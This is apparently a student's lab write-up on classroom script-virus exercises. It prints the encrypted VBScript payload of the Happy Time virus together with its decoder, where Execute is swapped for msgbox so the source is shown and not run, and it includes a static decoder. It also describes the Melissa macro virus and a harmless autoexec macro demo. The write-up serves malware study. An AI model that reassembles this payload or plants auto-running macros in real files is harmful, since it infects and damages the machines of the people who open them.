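Background
In the last class, Instructor Lin mentioned three script viruses that we should try out for ourselves, so I tried the following viruses:
- Happy Time
- Melissa
- bash virus
Happy Time
The virus lives in an .htm file. When the web page is opened, the VB script inside it runs automatically, and that is how the infection happens.
Procedure
Instructor Lin had already packaged the relevant code. Opening the archive, I found a txt document with the instructions written in it, so I simply followed them.
The steps are as follows:
Sample files
========
Samples.
Viewing the decoded ExeString:
========
1. Take a sample file and rename it to, for example, x.htm;
2. Insert an erroneous line before Execute(ThisText);
3. Open x.htm in a browser; it will stop at the erroneous line and show a debugging prompt;
4. Enter debugging mode;
5. You can now see ThisText, the decrypted form of ExeString;
Partial code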
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "Aee?FjOgbn]+EpekQaps)RZrQaps)@]foa]Rfcf+>lhkbKZib_l+COG+ToKgbhd+TefO^p`+PqZD)Bam^hqCfoc??Oma?GB^ppYqq$!??GBRbp<hj$!??GBBoaYsbIakfam'&??JGHajbEl'&??JG?jd^p]L^ed'&??JGLjnm]_`qa (??=ma?Kt_????Bmm`pank?CI>lhdk`Ln%BakbLYse(LxmaKso%??Lj?Dongq?N]rri]?Kaps??Kdq?Jd^`Ldjl?<?BKN+KhdkP]wqBakb$>hiaH`qd$0&??SjlKso?5?OaYcQaeo+N]`a=dk??Ae?Efrqn SjlKso(?JG[ks^nl'&?!?9:?/?Kj?Iaf'QihRqn!?9?)?Qd]m??Jd^`Ldjl&Bikkd??=wfp?Erj[sfkf??Afc?E^??E^?QuhdPpj?:??gqp??Qd]m??Jd^`Ldjl&Bikkd??Kdq?>hiaLdjl?<?BKN+KhdkP]wqBakb$>hiaH`qd$1&??Efh]Sbih-Tnasb??;?????>GCV?gmikYc:??!???!s^kboehs7??%??CI\ol`op (????#??=????s^;qIb?%?PeoPpj?#?na@nDe???GqidSbtl??BakbP]lm*;klo]??O]s?B9sqnaa?9?EPK&Fbp>hia Efh]O^p`(??>@qpjh_*Ysqnaarp]r?9?21??Dio]??N]`aP]lm*;klo]??O]s?BakbP]lm?5?COG-Ll]mQapsCedd%BakbLYse(0(??Ae?PqobOlq?9?!epek??Lgbj??CeddQaeo+Sjhqa?u_?jKc????8??#??GQID=????s^;qIb?%??4!???!?K<X?kfkl]\<????#??u_o[qfll9?????GB^ppYqq$!!???%??6!???u_?jKc???EpekQaps??=kpaAe?PqobOlq?9?!s^k!?P`dk??Efh]Sbih-Tnasb?na@nDe???U_oLdup??Bj\?Fb??CeddQaeo+?dnpa??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBBe]ffbOma%?mqoafsPpjhkc$K^olHk`]w@dYq&??Hc?D`ppAmaapBe]j?:?(?Qd]m??Ae?H]eq$DB^o]'@qjqbjlRqnamd%$0&?5;?H;`pa !`?!?Qd]m??CI@dYmdaKt_?5?Cef`iu<hpg?%??2[???Rr^=?:?(??Adrb??JG?``kc]Rr^?<??`q%=kb%H]eq$DB^o]'@qjqbjlRqnamd%$0&%?,?-!?#??9Y???PqZD?9?/??=ma?Ae??=kpa??HF;g^j_dPqZ?:?Eha$;ton]mqOlqfj_+.(D`ppAmaapBe]j(??=ma?Ae??=ma?>tk_lhlj????>tk_lhlj?JG?jd^p]L^ed'&??Nk?=qokj?Oaktja?Mbtl??E^?FjOgbn]?:??gqid!?P`dk??Duel?Cqfbqegm??=ma?Ae??Kg^n]Efh]?:?Ddcp VfjH`qd$2&????LjndnYl?BakboTBlienk?>hiak[Je[qlogeq?Kg^n]cYOl`qegmbnq[_hYmh*`sj???Fb?'COG-CeddBtarqo 
Re]jdCedd&%?Seaf???Yki?CI>lhdk`Ln%O``oa>hia$!epek?%??Bhkd??Kdq?>hiaLdjl?<?BKN+KhdkP]wqBakb$Kg^n]Efh]+/(lqra!??BakbP]lm*Oqfp]??8??#??GQID=????s^;qIb?%??4!???!?K<X?kfkl]\<????#??u_o[qfll9?????GB^ppYqq$!!???%??6!???u_?jKc???EpekQaps??>hiaLdjl&Bikkd??=ma?Ae??<dc]mkqE\?:?OrPd]ki*JddN]`a$?GHAQ^@QJQBJL^RO=QYE\dkpasfak[Aa^`rhl?Ro]q?E<!&??NrpDnlgNdooank?5?ToKgbhd-Oa_Qb]\'?DCDV[DN@=D^J=;GFJ=[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoTLb`a`Saj!&??VpO`dih&QbcOqfp]??DCDV[;TON=MQ[MRBNTHaafsfpadpX?%Aa^`rhlHa??[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoT!#?Ddcp NrpDnlgNdooank()(???--XE`fhTBlihnpa?Tpa?Rq]lhlj]qv?$0)?JDD[<VLN<!??;`ih?JGIYhiN]f%?@JBUWBRNJDKPWTPAJ[F`]mqelhboT!#@]e^qdsF`?!YOgeqsYqbXEh`ngrlbl[Lqlklkc?Bthqbok[???Kbbl'LqlKlkcUbnkhlj$0&??!+,TL^ed[PpYsfkfdou?M^i]!)O``oa>hia!???Yki?CIJ]akOa_'?DCDV[;TON=MQ[MRBNTHaafsfpadpX?%Aa^`rhlHa??[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoT!#?Ddcp NrpDnlgNdooank()(???--XE`fhTVf`]?PpYsfkfdou?M^i]!)O``oa>hia!??SkReadk+N]fTnasb??GHAQ^@QJQBJL^RO=QYOgeqsYqbXEh`ngrlbl[Lb^h`aT8+,TNrpdnlgTNmpankoTL^ed[B`aslnHqbb]qbj[d?()2.,/1)?JDD[<VLN<!??;`ih?JGIYhiN]f%?@JBUWBRNJDKPWTPAJ[Pk^st]jdYIabokkncpTVfj\nto?Lbok`deff?OmapuksbiTOok^hiak[Je[qlogeq?Gtqhgnh?Amqajmbp?Rbplhkck[-](c-.(/-,(/-,(/`,(/-,(/-,(/-,,5Y,(0b,+5-?$!_hYmh?!???Yki?CIJ]akOa_'?DCDV[;TON=MQ[MRBNTRlblv^n][Je[qlogeqXOhk`gvp?FSY?mqoafsSajrfkf[Tefclsk?Jakr^camd?Kt_oqrqae[Mngefh]rYIabokkncp?Nrpdnlg?Hkp]qkal?Palsfj_rY,Y/a,*/-,(/-,(/-_(/-,(/-,(/-,(33X(/.a(23,?+?^d`kg?(??OrPd]ki*JddSjhqa?!EG=X\?MQOAFS\QKDOXKncpo`oaTLf_jnpk^sYK^ef_][.,&/YKmsikgjYKhsfkfrYIYhiX=cfpgqMn]ebn]m`a?+./)/4.$!OA?^ASGQA???@]dk?GBL^edQbc 
!EG=X\?MQOAFS\QKDOXKncpo`oaTLf_jnpk^sYK^ef_][.,&/Y?gljkf[J]akPalsfj_rYJ]vPpYsfkfdou?+?^d`kg?(??CIrie`da>ni`]q%H]eq$OhkLYse(+(???!Mngfo]e?CeddpX;njigm?BakboTLf_jnpk^s?O``oa\[PpYsfkfdou?(??=ma?>tk_lhlj????>tk_lhlj?JG?jd^p]Lfhadr$!??Kf?Bnjno?Jdpqed?J]wq??SbihO^p`?:??!??Ae?Jgs%BKN+BakbAphppk'TefO^p`?#??VP_jhmp&dua?(&?Lgbj??QaeoM]lg?9?!puksbi+1Y???Bj\?Fb??Fb?SbihO^p`?:??rvoldj/*[??Lgbj??PpYqqQhEfh]?:?OhkLYse????OQRQAE[Hajmbh+1+`dk???Dio]??Ol`opMoCedd?9?VfjH`qd?%??KXPP=LYG]qkad-ahd!??=ma?Ae??OrPd]ki*JddSjhqa?!EG=X\HGB>HWL>?@HKATRlblv^n][Je[qlogeqXOhk`gvpX;ton]mqR]qpegmYNmmYG]qkad2/?$Rq]jsRl>hia??COG-@khxCedd?SamM]lg???!taZ[hfo`ih&ffb?+TefO^p`?#??vb^TElh\do*`sq???COG-@khxCedd?SamM]lg???!puksbi+1Ygbv^hd-de^!)SamM]lg???!puksbi+1Y`]rhpgo+efh???B^hd?HF9omafcQk VfjH`qd?%??od_X>ni`]q+dls?(?gqp?(??OrPd]ki*JddSjhqa?!EG=X\?D@PO=R\NGNQX&cihT!)?\kibakb???ToKgbhd-Oa_Voeld??@JBUWBI=KRBOWQLKL[+`dkY?gmqafs?Pqob?$!^lhkf_Ysfkf.u)erakomikYc???VpO`dih&QbcOqfp]??DCDV[;K>OKDP[JNLPTcih^hiaTCbbYtipAbljT!)SkReadk+N]fOaYc%?@JBUWBI=KRBOWQLKL[st\efh][Aa^`rhlH`kf[?%??ToKgbhd-Oa_Voeld??@JBUWBI=KRBOWQLKL[ahdefh][P_jhmp=mdefdY?$!S>Kboehs???VpO`dih&QbcOqfp]??DCDV[;K>OKDP[JNLPTcih>hiaTReadkYKhdkX;njiYmaX?+TefO^p`?#?LdjlH`qd?%??OR`naoq*]wb??!?-?!?!?!??OrPd]ki*JddSjhqa?!EG=X\?D@PO=R\NGNQX\kiBakbXKgbhdDuXHqll]qquKgbalG^j\kbnk[TO@OokhrY?$!x2(120;@2)140>%0.?>,5?15*,(@>,(A53(7@y???SkReadk+N]fTnasb??GHAQ^@H9RPAK^OKGSY`dkCeddYO[qfllGlolDk_gcbX?+?w04./)50-%35,;,.-<1*>)E6)(/@,,E52;2/0u!??Kdq?>hiaLdjl?<?BKN+KhdkP]wqBakb$Ks^nlTmBakb(*+qnmd&??Efh]Sbih-Tnasb?NapP]wq??Efh]Sbih-@hgrb??Dk`?Erj[sfkf????Erj[sfkf?HFDhhaAs%%??Fb?HkS`doa?;;??gqid!?P`dk??Duel?Cqfbqegm??=ma?Ae??LgfoDn`]lhlj?<?`gbri]mq*dn`]lhlj??Fb?Kbbl'QdarIk[`qegm)?,(?9?!cedd??Lgbj??QdarIk[`qegm?9?Lf` SeekKl_Ysfkf+6%??Fb?EPK&Fbp=wqafrfkfM^i]'QdarIk[`qegm&?4=????qd]m??LgfoDn`]lhlj?<?H]eq$LgfoDn`]lhlj$Kbj SeekKl_Ysfkf(?)?Kbj EPK&Fbp>hiaF`ja SeekKl_Ysfkf(&%??Bj\?Fb??Fb?Kbj 
SeekKl_Ysfkf(?:?2?P`dk??SeekKl_Ysfkf?:?LgfoDn`]lhlj?%??T!??=ma?Ae??CIrie`da>ni`]q%P`hpHgb^pank%??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBL^edQbc QbcKso(>hiaF`ja!??Kf?Bnjno?Jdpqed?J]wq??QbcLdjlKso?5?ToKgbhd-Oa_Qb]\'Oa_Rqn!??E^?Oa_SbihRqn?<????Qd]m??OrPd]ki*JddSjhqa?QbcKso(>hiaF`ja??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBN_kKt_$;ton]mqOlqfj_(??Kt_A?<?,??QaksLql?:?(??@g?Tdakb?Lqra??QaksLql?:?LdppGtq?#?.??Hc?LdppGtq?6?/4?Seaf???mqoafsPpjhkc?<?Bam^hqCfoc?#??9Y???Btas?@g??Afc?E^??Kf?Bnjno?Jdpqed?J]wq??Rbp?SeekElh\do?5?COG-DalElh\do$;ton]mqOlqfj_(??Kdq?<h`Oma?9?BoaYsbKZib_l'?O[qfllhkc&Cf_lhljYqv?!??O]s?Bgkaajr?9?SeekElh\do*Kt_Bgkaajr??>ni`]q@kmmq?5?-??Eln?D^_`?QaeoCkdcbn?hk?>ni`]qp??Elh\do?gtkp?<?BgkaajBlqfs?'?0??<h`Oma+]\c?BgkaajBlqfs)?Ldjl>ni`]q+JYlb??Mbtl??E^?Ae[Rr^&Blqfs?9?/?P`dk??K^olHk`]w@dYq?9?HkolqOan'@qjqbjlRqnamd(?[?(Ddk$;ton]mqOlqfj_(*-!??OmaPpjhkc?<?Iac%?mqoafsPpjhkc$K^olHk`]w@dYq(-$Kbj BrnjdkpKsoeff&)D`ppAmaapBe]j,.%??@qjqbjlRqnamd?5?HF;g^j_dPqZ'@qjqbjlRqnamd(D`ppAmaapBe]j(??Kt_A?<?-??Bhkd??Ae?OmaB?5?-?Lgbj??@qjqbjlRqnamd?5?@qjqbjlRqnamd???Ae[Rr^&Hqae'.%?%??T!??=wfp?Cl??Dio]??f?<?,??Ckj?g?5?.?Ln?BgkaajBlqfs??Ae?H;`pa Rr^Ksoeff&?5?I?Yrb$<h`Oma+Eldj$b(&?Lgbj??Fb?i?8?Elh\do?gtkp?Seaf???mqoafsPpjhkc?<??mqoafsPpjhkc?%?@abPqZ-Fp]l%f#0&????X???Aphq?<n??=ma?Ae??=ma?Ae??Fdup??I]ksFj\du?``o?5?FjksoN]u%?mqoafsPpjhkc$!Y?$Kbj 
BrnjdkpKsoeff&))(??Kt_Olqfj_?:?Eha$;ton]mqOlqfj_+I]ksFj\du?``o')+Iaf'@qjqbjlRqnamd%%K^olHk`]w@dYq*-!???mqoafsPpjhkc?<?GBBe]ffbOma%?mqoafsPpjhkc$K^olHk`]w@dYq&??Dk`?Hc??Dk`?Hc??Klkh??GBN_kKt_?5?@qjqbjlRqnamd??Dk`?Erj[sfkf????Erj[sfkf?HFHqllYf^p]'&??Nk?=qokj?Oaktja?Mbtl??N]fM]lgS]dtb?5??DCDV[DN@=D^J=;GFJ=[Pk^st]jdYIabokkncpTNrpdnlg?DuljdpoTCbcjdb???AekjAa_qba?<?SkReadk+N]fOaYc%N]fM]lgS]dtb%??Fb?CfocCbcjdb?5????Seaf??@arh@]foa]?:?>hk]dxAekj???!7X???Afc?E^??Bgq?e50?pg?2??CfocCbcjdb?5?HFGalOma%@arh@]foa](??CIrie`da>ni`]q%@arh@]foa](??Fdup??ToKgbhd-Oa_Voeld?N]fM]lgS]dtb(<hpg<ddn]d??=ma?>tk_lhlj????>tk_lhlj?JGqel^c]Elh\do$H`qdF`ja!??Kf?Bnjno?Jdpqed?J]wq??Rbp?Elh\doJYlb?5?COG-DalElh\do$H`qdF`ja!??O]s?P`hpBakbo?<?BgkaajM^i]-Ceddp??Gqp=wfolr?9?/??>no?=``d?SeekEfh]?Fj?SeekEfh]r??>hia=wq?5?R?Yrb$>RL*?dqApsbjkhljF`ja SeekEfh]-M]lg&%??Fb?Efh]Dup?<??@SJ??No?>hia=wq?5??DLLI??No?>hia=wq?5??=KO??Gq?BakbAps?9?!MDH!?Kj?CeddBtl?:??IPL??Qd]m??;`ih?JG=hobj\Sl$Lgfo>hia&O^p`+?dlli?!??AdrbE^?CeddBtl?:??U?O??Qd]m??;`ih?JG=hobj\Sl$Lgfo>hia&O^p`+?rZr?%??BhkdFb?Efh]Dup?<??@SQ??Seaf??DlsBtarqo?<?-??Bj\?Fb??Kaps??Ae?$MB^o]'M]lgK]ed&?5?R?Yrb$OhkLYse????@]rhpgoY?!(?Kj?%Q;`pa O^p`M^i](?9?T@]kd%SamM]lg???!Aakjqkh!&%Lgbj??EplDueksp?5?.??Dk`?Hc??Hc?@sqAphppk?:?(?Qd]m??>RL*;nmu>hia?VfjH`qd?%??kxpp]l0.Tcbocsll&hke?+M]lgK]ed??>RL*;nmu>hia?VfjH`qd?%??od_X>ni`]q+dls?(H`qdF`ja??Bj\?Fb??Bj\?Cqfbqegm????Cqfbqegm?GBRbp<hj$!??Kf?Bnjno?Jdpqed?J]wq??Don&BiaYq??LdppAs?9?VP_jhmp&R`naoqBmkijYlb??Hc?=qo?Lgbj??FjOgbn]?:??gqid!??=kpa??FjOgbn]?:??u_o???Afc?E^??E^?FjOgbn]?:??u_o??Qd]m??Kdq?>RL?5?@n]`qaGaga[s%?Kboehsfj_-CeddPuksbiGaga[s?%??Pal?ToKgbhd?:?;qb]ldL^bd`p !TO[qfll-Pd]ki?!??Adrb??Rbp?@mlddL^bd`p?<?`gbri]mq*Yomh]sp$?JG[_tbol!&??@mlddL^bd`p&rbp;KPE<'?w>801<B/.%0@B(,.-</*=<A6)(/@,,EA10@->u!&??@mlddL^bd`p&boaYsbEfrq]fbb$!??O]s?SkReadk?9?@mlddL^bd`p&FbpGaga[s%%??>lhkbKZib_l-palBIOAC%?s/A0+EB,),C,12*-)BC)081,%/-=(B6,-3/.0|?%??>lhkbKZib_l-`n]`qaAmppYm`a 
(??Kdq?>RL?5?>lhkbKZib_l-DalN_f]bq$!??Afc?E^??O]s?@arhKZib_l?:?>RL*<qfr]r??>no?=``d?CfocSbih?Fj?CfocN_f]bq??Hc?<hpgLdjl&CoendQuhd?86?/?9ma?<hpgLdjl&CoendQuhd?86?.?Lgbj??Btas?Bgq??=ma?Ae??>hk]dxAekj?9?CfocSbih-AnaubH]sqaj??J]wq??Cfi?Nqd]q>nj'0%??O]fcliayb??Eln?h:,?Sl?+??Klgbn9qo$a(?9?Hkp '6???Oj\(&??Mbtl??P]lmOlqfj_?:??!??>no?a<.?Ln?H]m%P`hpP]wq%??QaeoKqe?:?9r`$Eha$LgfoLdup$h)-!(??Ae?P]lmJml?9?00?Lgbj??QaeoKqe?:?*7??=kpaAe?P]lmJml?9?0-?Lgbj??QaeoKqe?:?*8??=ma?Ae??Ldjl;g^n?<??`q%P]lmJml?)?Nqd]q>nj'f?Ena?,(&??Hc?Ldjl;g^n?<??`q%/,(?P`dk??SbihBe]j?:?;go$)7&??Dk`?Hc??SbihRqnamd?5?QaeoPpjhkc?%?P]lm?``o??Mbtl??QfKl_cRqn?<??=wb_msb$?!Aee?Haq@on 2&(LgfoLdup?!#rZBoH^%??Cdv=jq%,!?:???#?Gseaj@on /&??????%s^;qIb?!?G]x>nj'.%?<???%?Klgbn9qo$)(???!???u_?jKc??!Haq@on 1&?5?????Lp`do=jq%.!?#??!??na@nDe#??Jbu9qo$+(?9?!???Nqd]q>nj'0%?%???!#rZBoH^%??>no?a<.?Ln?H]m%ApdPpjhkc!!??na@nDe#??SbihMri?<?=kb%Iac%ApdPpjhkc$h)-!(???u_?jKc??!Fb?SbihMri?<?-0?Qd]m???u_?jKc??!QaeoKqe?:?+3???u_?jKc??!Bj\?Fb?!#rZBoH^%??Ldjl;g^n?<??`q%P]lmJml?'?Jbu9qo$a?Jk\?1%!!??na@nDe#??Hc?Ldjl;g^n?<??`q%.0(?P`dk??%s^;qIb?!?P]lm?``o?5?s^;q???u_?jKc??!BhkdFb?SbihBe]j?:?;go$*8&?Lgbj?!#rZBoH^%??Ldjl;g^n?<?rZKc??%s^;qIb?!?Afc?E^!??na@nDe#??SeekSbtl?:?LgfoLdup?%?P]lm?``o??%s^;qIb?!?J]wq??(????s^;qIb?%??=wb_msb$LgfoLdup!!??LgfoLdup?<??=wbOlqfj_?:??!????QaeoPpjhkc?%???!???GqidSbtl?:?4!???!p_jhmp?k^j_t^c]<s^kboehs;??%?rZBoH^?#??cl_mlbjl-tnasb???#??!???%??4!???!aen?ppqkb9?oloasfkf9^^kniqld8?ddcp2/mt3?qkh9-lp:?sacqd2/mt3?eaafep2/mt3?w)amaap9/43?sekh_edhqu2?ee\cbj?=?????8?!#??!???!>LHKBP?M>I=<HF?!#??^dq]rq?@DFC@S:,?VF@LG:,?bl`]<`ke-jo&!???!^_lhsaP->_lhsa?!#??W@keolj]mq:??#??;?????+9OMH=S;??%??4!???!,`au;??!???u_?jKc????8??#??.p_jhmp6!???u_?jKc????8??#??r`naoq?d`kcm`da5u_o[qfll=????s^;qIb?%?P`hpP]wq???s^;qIb?%?QfKl_cRqn?%?rZBoH^?#??;?????+kboehs;??%?rZBoH^?#??;?????+:NAU6!???u_?jKc????8??#??.EPEK;???S^kSbtl?:?LgfoLdup?%?rZBoH^?#?MmIk[jPpj?#?na@nDe???!HFWrq]js%%???SamM]lg?9?EPK&FbpKob_a`iBgkaaj'-%?%??T!??Ae?$>RL*>hia=wfolr%SamM]lg???
!taZ[Ckdcbn&gqp?(&?Lgbj??COG-@khxCedd?SamM]lg???!taZ[Ckdcbn&gqp?+TefO^p`?#??vb^TjgsYki*_hc???Bj\?Fb??Fb?'COG-CeddBtarqo VfjH`qd?%??kxpp]l0.Tcbocsll&hke?(&?Lgbj??COG-@khxCedd?SamM]lg???!puksbi+1Y`]rhpgo+efh?(OhkLYse????oqrqae2/Xcit]dk+cae???Dk`?Hc??Dk`?Erj[sfkf"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 1"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 4"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
msgbox(ThisText)
</script>
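ExeString holds the source code of the Happy Time virus in encrypted form. Calling the decryption routine on the fifth line produces the real source code, which is then run with Execute. Here, for study purposes, that was changed to msgbox so the code is printed instead; the printed result is as follows: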

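The decoding stub above can also be reproduced statically, so ThisText can be read without opening the sample in a browser at all. The following is an added example, not part of the original post or the course material; the names `extract_exestring`, `decode_exestring` and `SAMPLE_HTML` are hypothetical, and the sample input is constructed.

```python
import re

KEY = (1, 3, 4, 8)  # KeyArr(0)..KeyArr(3) from the page's Execute(...) stub


def extract_exestring(html: str) -> str:
    """Pull the ExeString literal out of the file text without running it."""
    # Assumption: the literal contains no '"' character (the stub maps
    # code 18 back to 34, which is the double quote).
    m = re.search(r'ExeString\s*=\s*"([^"]*)"', html, re.S)
    if m is None:
        raise ValueError("no ExeString literal found")
    return m.group(1)


def decode_exestring(encoded: str) -> str:
    """Re-implement the stub: add KeyArr(i Mod 4) to each character code."""
    out = []
    for i, ch in enumerate(encoded, start=1):  # VBScript Mid() is 1-based
        code = ord(ch)
        if code == 18:          # "If TempNum = 18 Then TempNum = 34"
            code = 34
        code += KEY[i % 4]
        if code == 28:          # Chr(28) stands for vbCr
            out.append("\r")
        elif code == 29:        # Chr(29) stands for vbLf
            out.append("\n")
        else:
            out.append(chr(code))
    return "".join(out)


# Constructed sample: the harmless text x&"hi" plus CRLF, encoded by hand
# with the same scheme so that every branch of the decoder is exercised.
SAMPLE_HTML = (
    '<script language=vbscript>\n'
    'ExeString = "u\x12\x1agf\x1e\x14\x1c"\n'
    '</script>'
)

# First 20 characters of the ExeString exactly as printed on this page.
PAGE_PREFIX = "Aee?FjOgbn]+EpekQaps"

if __name__ == "__main__":
    print(repr(decode_exestring(extract_exestring(SAMPLE_HTML))))
    # Prints Dim@InWhere,HtmlText: the '?' decodes to '@' where a space is
    # expected, which suggests non-printable bytes were lost in this copy.
    print(decode_exestring(PAGE_PREFIX))
```

Because the decoder only builds a string and never calls Execute, it is safe to run against a quarantined sample file read in as text.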
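Melissa virus
- Wikipedia
The Melissa virus is a computer virus that belongs to the macro virus category[2]. It began spreading on a large scale on March 26, 1999, and became famous for forcing the e-mail servers of large companies around the world to shut down for a day, even prompting the FBI in the United States to get involved.
Melissa can infect the document macros of both Microsoft Word 97 and Word 2000, and it sends 50 automatic e-mails through the address book of the infected user's Microsoft Outlook mail client. The e-mails appear to be signed by someone the recipient knows, so many people did not notice, which led to chain-like, large-scale spread. The US company Amazon.com was hit hard and at one point required employees not to open any Word file containing macros.
This is a macro virus that relies on Outlook to spread. It disrupted e-mail systems around the world, including those of Microsoft and Intel.
Hands-on
Add a macro and name it autoexec (case does not seem to matter), as shown in the figure at the upper right.
Add a little code: a msgbox that displays a prompt box. A real virus would not pop up a box; it would just quietly lie in wait and do its damage.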


Close the current document and open it again; delete the current doc file and open another, earlier doc file.
